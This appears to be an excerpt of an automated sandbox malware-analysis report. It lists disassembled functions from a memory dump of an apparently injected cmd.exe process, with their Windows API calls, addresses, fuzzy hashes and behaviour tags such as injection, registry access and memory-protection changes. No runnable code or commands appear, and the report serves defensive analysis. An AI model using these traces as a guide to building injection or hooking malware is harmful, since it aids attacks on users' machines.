CloseHandle.KERNEL32(00000000,?,03044958,?,?,?,?,030317CA,?,?,?,00000001,0305C1AC,00000000), ref: 0303726B

Part of subcall function 03038728: RegCloseKey.ADVAPI32(?), ref: 030387AB

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Event$Close$HandleOpenResetSleepmemset
String ID:
API String ID: 869721410-0
Opcode ID: 6c7d04cc3068fd2a5f8559f3be631d3a3ae6db82b51a044d788af71ac49eb5b9
Instruction ID: ef590064feedd86714243778b35172bf23208d0e8ac620d24e2f109891c99e64
Opcode Fuzzy Hash: 6c7d04cc3068fd2a5f8559f3be631d3a3ae6db82b51a044d788af71ac49eb5b9
Instruction Fuzzy Hash: DA21DA76207314ABD310FB6AAC48EAB7BADEBC7611F054414F609D7104DB3D94008B64

Uniqueness

Uniqueness Score: -1.00%

Function 03032FBB, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0303FC76: GetCurrentThreadId.KERNEL32 ref: 0303FCAE
Part of subcall function 0303FC76: GetSystemTimeAsFileTime.KERNEL32(0304B2AE,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?,0000000E), ref: 0303FCBA
Part of subcall function 0303FC76: GetTempFileNameA.KERNEL32(00000000,00000000,0304B2AE,00000000,?,?,?,0304C810,00000929,00000000,?,?,0303D87C,00000000,00000000,?), ref: 0303FCC8
Part of subcall function 0303FC76: lstrcpy.KERNEL32(00000000), ref: 0303FCEA

DeleteFileA.KERNEL32(00000000,000004D2), ref: 03032FDE
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03032FE7
GetLastError.KERNEL32 ref: 03032FF1
HeapFree.KERNEL32(00000000,00000000), ref: 030330B0

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$Time$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemTempThreadlstrcpy
String ID:
API String ID: 855586217-0
Opcode ID: 3462e70080b28040fe055ee3b959baba716e2e940978b671b5ac72eb7cdda0ff
Instruction ID: 320e8eeb8b2d0d6d9d13def06a18d29cd5fb22c8096bbb541ba20da69f23b39b
Opcode Fuzzy Hash: 3462e70080b28040fe055ee3b959baba716e2e940978b671b5ac72eb7cdda0ff
Instruction Fuzzy Hash: FF215E7B513314ABD711FBA4EC58ECB339CDF86652B044A61FA01CB154DA38E542CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 030383D6, Relevance: 7.6, APIs: 5, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(0303AAC3,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,03043704,00000000,?,?), ref: 030383F4
GetFileSize.KERNEL32(00000000,00000000,?,?,03043704,00000000,?,?,?,00000000,-00000007,0304A023,-00000007,0303AAC3,00000000), ref: 03038404
ReadFile.KERNEL32(0303AAC3,00000000,00000000,00000000,00000000,00000001,?,?,03043704,00000000,?,?,?,00000000,-00000007,0304A023), ref: 03038430
GetLastError.KERNEL32(?,?,03043704,00000000,?,?,?,00000000,-00000007,0304A023,-00000007,0303AAC3,00000000), ref: 03038455
CloseHandle.KERNEL32(000000FF,?,?,03043704,00000000,?,?,?,00000000,-00000007,0304A023,-00000007,0303AAC3,00000000), ref: 03038466

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastReadSize
String ID:
API String ID: 3577853679-0
Opcode ID: ed97b93ade1952f97147fd7866a93a81bd2bf69fa44846fa4f0109ff8996ee22
Instruction ID: a0f426812e43a00509d9a33635de6799e32bab901b6484faf81f975ae87dfbd0
Opcode Fuzzy Hash: ed97b93ade1952f97147fd7866a93a81bd2bf69fa44846fa4f0109ff8996ee22
Instruction Fuzzy Hash: 9A11E772102218EFDB20AF64C888BAFBBADEB473A0F15C565F91597940D7318D448760

Uniqueness

Uniqueness Score: -1.00%

Function 0304C85A, Relevance: 7.6, APIs: 5, Instructions: 67memorysynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00004000,00000000), ref: 0304C888
GetLastError.KERNEL32 ref: 0304C8AB
WaitForSingleObject.KERNEL32(?,000000FF), ref: 0304C8BE
GetLastError.KERNEL32 ref: 0304C8C9
HeapFree.KERNEL32(00000000,00000000), ref: 0304C911

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorHeapLast$AllocateFreeObjectSingleWait
String ID:
API String ID: 1671499436-0
Opcode ID: c83200fcd9f87ce89bdb5e3e3faf6d837525eb30acaa4d888ce1eed33c2468dc
Instruction ID: 7f87a461db8f42f3ac1e02a95257050da5414d56eb74a17d556da1d6eb94e2bf
Opcode Fuzzy Hash: c83200fcd9f87ce89bdb5e3e3faf6d837525eb30acaa4d888ce1eed33c2468dc
Instruction Fuzzy Hash: 51218EB1603308FBFB60DB55D88CB6F7BB8EB01315F641468E152961A0C776EE84CB10

Uniqueness

Uniqueness Score: -1.00%

Function 0305185C, Relevance: 7.6, APIs: 5, Instructions: 62memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(03031281,?,?,?,?,00000008,03031281,00000000,?,?,0304B2AE,?,?,00000000,030448DE,00000000), ref: 03051879
memcpy.NTDLL(03031281,?,00000009,?,?,?,?,00000008,03031281,00000000,?,?,0304B2AE,?,?,00000000), ref: 0305189B
RtlAllocateHeap.NTDLL(00000000,00000013), ref: 030518B3
lstrlenW.KERNEL32(00000000,00000001,03031281,?,?,?,?,?,?,?,00000008,03031281,00000000,?,?,0304B2AE), ref: 030518D3
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00000008,03031281,00000000,?), ref: 030518F8

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
String ID:
API String ID: 3065863707-0
Opcode ID: a5092c73fcabe913ed11fdf722bc33fb44824d89a26435ec9c7ded26833e9056
Instruction ID: 74cfb6d93cb1c1e858d357f44282ad118f607636724916afa7dd758ca3a09069
Opcode Fuzzy Hash: a5092c73fcabe913ed11fdf722bc33fb44824d89a26435ec9c7ded26833e9056
Instruction Fuzzy Hash: 6311937AD02309BBDF24EB94E809FEF7BB8AB48310F044021FA05E6280D778D644CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03043FEF, Relevance: 7.5, APIs: 5, Instructions: 45timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 03044002
CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03044014
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 0304403E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03044051
CloseHandle.KERNEL32(?), ref: 0304405A

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
String ID:
API String ID: 603522830-0
Opcode ID: 917c3df85fa104f26b914e4a86663ec9c4d5357577e212d30cd204b4f4354d55
Instruction ID: efc137ca96be20ca176965ae0bd047903b929a3fd66381022741945c9d5bf620
Opcode Fuzzy Hash: 917c3df85fa104f26b914e4a86663ec9c4d5357577e212d30cd204b4f4354d55
Instruction Fuzzy Hash: 44015EB1902219BBDB10EB95DC09DEFBF7CEF05350F044214FA56E2185DB759611CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0304EB2F, Relevance: 6.1, APIs: 4, Instructions: 112memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 0304EBDA
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0304EBED
lstrcpy.KERNEL32(00000004,00000000), ref: 0304EC0B
HeapFree.KERNEL32(00000000,00000000,00000001,00000000,-00000005,00000001), ref: 0304EC2F

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrlen
String ID:
API String ID: 1437807458-0
Opcode ID: 510e574dba6533deafab69af502e66a21bb19e1436bc90ef28bc8cae6f62196c
Instruction ID: 6279a6a8d75b258d1a4ad92ccdbf3b031a8852cc47e50c3b4e4fb22ab2310b89
Opcode Fuzzy Hash: 510e574dba6533deafab69af502e66a21bb19e1436bc90ef28bc8cae6f62196c
Instruction Fuzzy Hash: 8F317E75902319EFDB10EBA8C884AAF7FF8FF05740F149066F50597240D7749A41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03042972, Relevance: 6.1, APIs: 4, Instructions: 112stringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,?,?,?,?,?,?,03031E60), ref: 03042988
lstrlen.KERNEL32(?), ref: 030429BF

Part of subcall function 03034CF5: RtlFreeHeap.NTDLL(00000000,00000000,0303194B,00000000), ref: 03034D01

memcpy.NTDLL(00000000,?,?), ref: 03042A41
memcpy.NTDLL(00000008,030563D8,00000002,00000000,?,?), ref: 03042A56

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Timememcpy$FileFreeHeapSystemlstrlen
String ID:
API String ID: 4125730466-0
Opcode ID: 2e7ecbb3a72b3da7b33e23db7286bbbb74b965c8f7cd0b1831b20e6c650f55da
Instruction ID: e26f204e5d8f6c9445d912a9fc0841c42916cc2de7a3250e480c65548682d0fe
Opcode Fuzzy Hash: 2e7ecbb3a72b3da7b33e23db7286bbbb74b965c8f7cd0b1831b20e6c650f55da
Instruction Fuzzy Hash: 32414AB5A01209EFDB50EF98D880EAFB3FCEF49208B144565F909D7211EB31EA15CB64

Uniqueness

Uniqueness Score: -1.00%

Function 03052880, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 030528AE
ResumeThread.KERNEL32(00000001,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 03052938
WaitForSingleObject.KERNEL32(00000064), ref: 03052946
SuspendThread.KERNEL32(00000001), ref: 03052959

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: 14a2d76566f4ec80ac2535e8c52919d532818d74b20102a403d3b6c4fc165e6a
Instruction ID: e3a9a2a3d5d71a1e9ed817ad2658cafed07440373d1d4540caae8d7b96d64c64
Opcode Fuzzy Hash: 14a2d76566f4ec80ac2535e8c52919d532818d74b20102a403d3b6c4fc165e6a
Instruction Fuzzy Hash: AB414CB1109341AFE721EF54C840AABBBEDFF88350F044D2DFA9486260D731D964DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0303FF23, Relevance: 6.1, APIs: 4, Instructions: 108synchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03040043

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

GetLastError.KERNEL32 ref: 0303FFB7
WaitForSingleObject.KERNEL32(00000000), ref: 0303FFC7
GetLastError.KERNEL32 ref: 0303FFE7

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 0694431f993127e874e9f2b11cbe116095ae9a7ee643add3c17382e19c1fea01
Instruction ID: 5743184250cbc5dfaf483a69555ee98d24e5bea85f229eade431a0cfcc13cbea
Opcode Fuzzy Hash: 0694431f993127e874e9f2b11cbe116095ae9a7ee643add3c17382e19c1fea01
Instruction Fuzzy Hash: BC41F8B1D02209EFDF50EFA4D884AAEFBB9FF05345F6444BAE501E6250D7359A40DB21

Uniqueness

Uniqueness Score: -1.00%

Function 0303EBA2, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0304AF7B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000100,?,?), ref: 0304AF89

RtlAllocateHeap.NTDLL(00000000,?), ref: 0303EC0A
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0303EC59

Part of subcall function 03047420: GetLastError.KERNEL32 ref: 0304746B
Part of subcall function 03047420: WaitForSingleObject.KERNEL32(000000C8), ref: 03047490
Part of subcall function 03047420: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 030474D9
Part of subcall function 03047420: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 030474EE
Part of subcall function 03047420: SetEndOfFile.KERNEL32(00000001), ref: 030474FB
Part of subcall function 03047420: CloseHandle.KERNEL32(00000001), ref: 03047513

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,0304A78D,?,?,?,?,?,?), ref: 0303EC8E
HeapFree.KERNEL32(00000000,?,?,?,?,0304A78D,?,?,?,?,?,?,00000000,00000000), ref: 0303EC9E

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FileHeap$AllocateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 2457821452-0
Opcode ID: cf76e21724fc38161502714458df91201f9c90b95caaa4832d6862cc5ee33f50
Instruction ID: 66310bc51e01c4e94d674ef5ceb2fbcd490b8aeb7abdafbb3d3bf6dda9650b8a
Opcode Fuzzy Hash: cf76e21724fc38161502714458df91201f9c90b95caaa4832d6862cc5ee33f50
Instruction Fuzzy Hash: 8B3112B6512219FFEB10EBA4DC88CAFBBBDEB09244B110065F505D3260DB75AE91DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03053775, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 030537B1
HeapFree.KERNEL32(00000000,00000000,?,03044CDD,?,?,00000000,?,00000000,03047732,?,00000000), ref: 030537CE
memcpy.NTDLL(?,?,03044CDD,?,03044CDD,?,?,00000000,?,00000000,03047732,?,00000000), ref: 030537EF

Strings

chun, xrefs: 0305386B

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: FreeHeapmemcpymemset
String ID: chun
API String ID: 2272576838-3058818181
Opcode ID: 696203b6ce00ffadb6985e4b97b72dff4b2f28f3e9233348b23975d893205211
Instruction ID: cfcd8e5493e8ab0b0f533251e88282d63058d7213f34ad89a03b56fb5471b00e
Opcode Fuzzy Hash: 696203b6ce00ffadb6985e4b97b72dff4b2f28f3e9233348b23975d893205211
Instruction Fuzzy Hash: 3131ABB5502706EFD760EF5AC844B67BBE8EF44350F05896AF959CB220D730E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0304499A, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,0303422A,?,?,?,?,2DE853EC,0303AAC3,0303422A,0303AAC3), ref: 03044A20

Strings

S-, xrefs: 03044A42
S-, xrefs: 03044A9B
S-S-, xrefs: 03044A4C

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memcpy
String ID: S-$S-$S-S-
API String ID: 3510742995-1321340305
Opcode ID: 9dfa8aa4729cd1bd6921d2389238fb921fdac9511a3686a224dbbd06575afd19
Instruction ID: 0f815a66ed9fb9de58b8e0ef51b9ffd6816f369ffa23cd57e58e5c1f2109d143
Opcode Fuzzy Hash: 9dfa8aa4729cd1bd6921d2389238fb921fdac9511a3686a224dbbd06575afd19
Instruction Fuzzy Hash: 21319EF150A302AFC790EE56C881A6EB7ECFB88214F044D3DF69587150DB70EA59CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0303483A, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0303485C

Part of subcall function 0303317C: RtlNtStatusToDosError.NTDLL(00000000), ref: 030331B4
Part of subcall function 0303317C: SetLastError.KERNEL32(00000000), ref: 030331BB

GetLastError.KERNEL32(?,00000318,00000008), ref: 0303496C

Part of subcall function 0305389B: RtlNtStatusToDosError.NTDLL(00000000), ref: 030538B3

memcpy.NTDLL(00000218,03055070,00000100,?,00010003,00000FFF,?,00000318,00000008), ref: 030348EB
RtlNtStatusToDosError.NTDLL(00000000), ref: 03034945

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-0
Opcode ID: b1ed03f15536cb25ac83aab6acdfabd4ef1db962e6a93cfda600dd68c68ef64b
Instruction ID: 0a6f93be02ff894e2d88a1327c490215ebb8e2a3178c743f552c656a9177df69
Opcode Fuzzy Hash: b1ed03f15536cb25ac83aab6acdfabd4ef1db962e6a93cfda600dd68c68ef64b
Instruction Fuzzy Hash: 0C31B271902309AFDB60DF65C884BAEB7FCEB09350F1445BAE546EB240D734AE44CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030458DA, Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 03042C7C: memcpy.NTDLL(00000000,00000110,0303AAC3,0303AAC3,00000000,00000000,00000000,?,?,?,0303422A), ref: 03042CB2
Part of subcall function 03042C7C: memset.NTDLL ref: 03042D28
Part of subcall function 03042C7C: memset.NTDLL ref: 03042D3C

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 03045932
lstrcmpi.KERNEL32(00000000,?), ref: 03045959
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0304599E
HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 030459AF

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: 9a2bdd23003da1c738d6c2b65a90318947afc994321adb295e7a6e72af5b4bd1
Instruction ID: 4dc68551ae21be2202dcefe8800a1b71733ab1ff75af74d814e1c093104d2c80
Opcode Fuzzy Hash: 9a2bdd23003da1c738d6c2b65a90318947afc994321adb295e7a6e72af5b4bd1
Instruction Fuzzy Hash: 172157B6A0230AFFDF10EFA4EC84AAE7BA9EF45214F044464F905EA114C735EE448B60

Uniqueness

Uniqueness Score: -1.00%

Function 03037A8F, Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03049A95: StrChrA.SHLWAPI(00000001,0000000D,?,03034EB2,00000000,?,00000001,00000000,00000001), ref: 03049ADF

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03037AF8
memcpy.NTDLL(00000000,?,00000007), ref: 03037B25
memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 03037B34
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 03037B46

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: memcpy$AllocateHeap
String ID:
API String ID: 4068229299-0
Opcode ID: 3de25e4029132c9ed6568c9ca0c52a6c2750bf35ab368a37074437116a4d6f16
Instruction ID: 9832fd255ced02419412476153e6b21e7223c2a2c4b3ef54fbbd910ecdfb6780
Opcode Fuzzy Hash: 3de25e4029132c9ed6568c9ca0c52a6c2750bf35ab368a37074437116a4d6f16
Instruction Fuzzy Hash: 802190B2502209BFDB10EF99CC84F9ABBECEF49654F054162E904DF151D770EA44CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 03053269, Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0305328B
lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 030532CF
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 03053312
CloseHandle.KERNEL32(?,?,?,?,?), ref: 03053335

Part of subcall function 03043D64: GetTickCount.KERNEL32 ref: 03043D74
Part of subcall function 03043D64: CreateFileW.KERNEL32(0304044B,80000000,00000003,0305C1A8,00000003,00000000,00000000,?,0304044B,?,?,?,00000000), ref: 03043D91
Part of subcall function 03043D64: GetFileSize.KERNEL32(0304044B,00000000,?,00000001,?,0304044B,?,?,?,00000000), ref: 03043DC4
Part of subcall function 03043D64: CreateFileMappingA.KERNEL32(0304044B,0305C1A8,00000002,00000000,00000000,0304044B), ref: 03043DD8
Part of subcall function 03043D64: lstrlen.KERNEL32(0304044B,?,0304044B,?,?,?,00000000), ref: 03043DF4
Part of subcall function 03043D64: lstrcpy.KERNEL32(?,0304044B), ref: 03043E04
Part of subcall function 03043D64: HeapFree.KERNEL32(00000000,0304044B,?,0304044B,?,?,?,00000000), ref: 03043E1F
Part of subcall function 03043D64: CloseHandle.KERNEL32(0304044B,?,00000001,?,0304044B), ref: 03043E31

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 4915aa96b587c17f98a70f1a7faf0ef13877fa54e25c4c63fbc5effc5e1093ff
Instruction ID: de22fa92f61fae8fa26ed247cefac85a9388443550287f27a1ddfe896233f8de
Opcode Fuzzy Hash: 4915aa96b587c17f98a70f1a7faf0ef13877fa54e25c4c63fbc5effc5e1093ff
Instruction Fuzzy Hash: 9A214879501308EADB21DF65DC44EEFBBB9EF84350F580165FC1592160DB31C555CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03054079, Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(0305C25C), ref: 0305408F
RtlLeaveCriticalSection.NTDLL(0305C25C), ref: 030540AA
GetLastError.KERNEL32 ref: 03054118
GetLastError.KERNEL32 ref: 03054127

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: CriticalErrorLastSection$EnterLeave
String ID:
API String ID: 2124651672-0
Opcode ID: 95ce64d576c8e16d754e0a164c987c68e392d83c7fb865e3033034138ca33782
Instruction ID: f22ac71c310ee75f5eb7c47a682f65286b6790b9a19adbff7edf7149554d2df0
Opcode Fuzzy Hash: 95ce64d576c8e16d754e0a164c987c68e392d83c7fb865e3033034138ca33782
Instruction Fuzzy Hash: E321483A902208EFDB11DFAAD844ADFBBB8EF48711F158155F909E3210C734DA51DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0305203A, Relevance: 6.1, APIs: 4, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0305208A
GetLastError.KERNEL32 ref: 030520BB
HeapFree.KERNEL32(00000000,?), ref: 030520CD
HeapFree.KERNEL32(00000000,?), ref: 030520E2

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$Free$AllocateErrorLast
String ID:
API String ID: 3560806655-0
Opcode ID: 25a19826ecd48e20118a86e365c50d87fcda99751e264154cc2c8021aa20a044
Instruction ID: 6fb19da43322abac20c82291864a2c119395363222638a719250621fc8646385
Opcode Fuzzy Hash: 25a19826ecd48e20118a86e365c50d87fcda99751e264154cc2c8021aa20a044
Instruction Fuzzy Hash: 56113D77503118FBCF21AA95DC48CEFBF7EEF453A0B105861F905E2155C6364A91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0303811C, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0305B620,0305B7A4,00000402,0305B7A4), ref: 03038154

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

lstrcpy.KERNEL32(00000000,0305B620), ref: 0303816B
StrChrA.SHLWAPI(00000000,0000002E), ref: 03038174
GetModuleHandleA.KERNEL32(00000000), ref: 03038192

Part of subcall function 0304FA40: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,03041BE7,?,0305B620,03041BE7,?,00000000,00000004,0303F20D,?,810C74FC), ref: 0304FB17
Part of subcall function 0304FA40: VirtualProtect.KERNEL32(0305B7A4,00000004,0303F20D,0303F20D,03041BE7,?,00000000,00000004,0303F20D,?,810C74FC,00000000,?,03058560,0000001C,03049FA2), ref: 0304FB32
Part of subcall function 0304FA40: RtlEnterCriticalSection.NTDLL(0305C300), ref: 0304FB56

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 8d20b4f7ece5196e2edfdaa84260be6184f4b9536f263ea7dd21f8b8ca7ae15a
Instruction ID: e53e097f64ae765be80a16081b2f7fb7a111ad701acc61a7fcb6fa2b09706989
Opcode Fuzzy Hash: 8d20b4f7ece5196e2edfdaa84260be6184f4b9536f263ea7dd21f8b8ca7ae15a
Instruction Fuzzy Hash: 6B216A75A01308AFCB54DFA8C848BAFBBFDAF45304F148499E9069B250D774DA48CB50

Uniqueness

Uniqueness Score: -1.00%

Function 030452AA, Relevance: 6.1, APIs: 4, Instructions: 66memoryregistryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?), ref: 030452C8
RtlAllocateHeap.NTDLL(00000000,?), ref: 03045308
HeapFree.KERNEL32(00000000,00000000), ref: 03045348
RegCloseKey.ADVAPI32(?), ref: 03045352

Memory Dump Source

Source File: 0000002F.00000002.673458621.0000000003031000.00000020.00020000.sdmp, Offset: 03031000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_47_2_3031000_cmd.jbxd

Similarity

API ID: Heap$AllocateCloseFreeOpen
String ID:
API String ID: 2210887687-0
Opcode ID: 32f29ed2a012fae7fb504f516b8abe3052822074087882281e93c6f4762a199b
Instruction ID: 408483959d08eb65fd23e374b600087e697a84ad1a8da0a7534293c36d8d330d
Opcode Fuzzy Hash: 32f29ed2a012fae7fb504f516b8abe3052822074087882281e93c6f4762a199b
Instruction Fuzzy Hash: 7B1129B6902208FFDB11EB99DC44CEFBBFDEB49605B1400A6F901E2118E375AA41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0303888A, Relevance: 6.1, APIs: 4, Instructions: 60stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000008,0303EA9C,00000000,?,00000000,03056048,00000000,?,0303C8DA,?,?,?,00000000), ref: 03038894

Part of subcall function 030463A7: RtlAllocateHeap.NTDLL(00000000,00000001,030318D4), ref: 030463B3

StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0303C8DA,?,?,?,00000000,?,00000000,00000000), ref: 030388BF
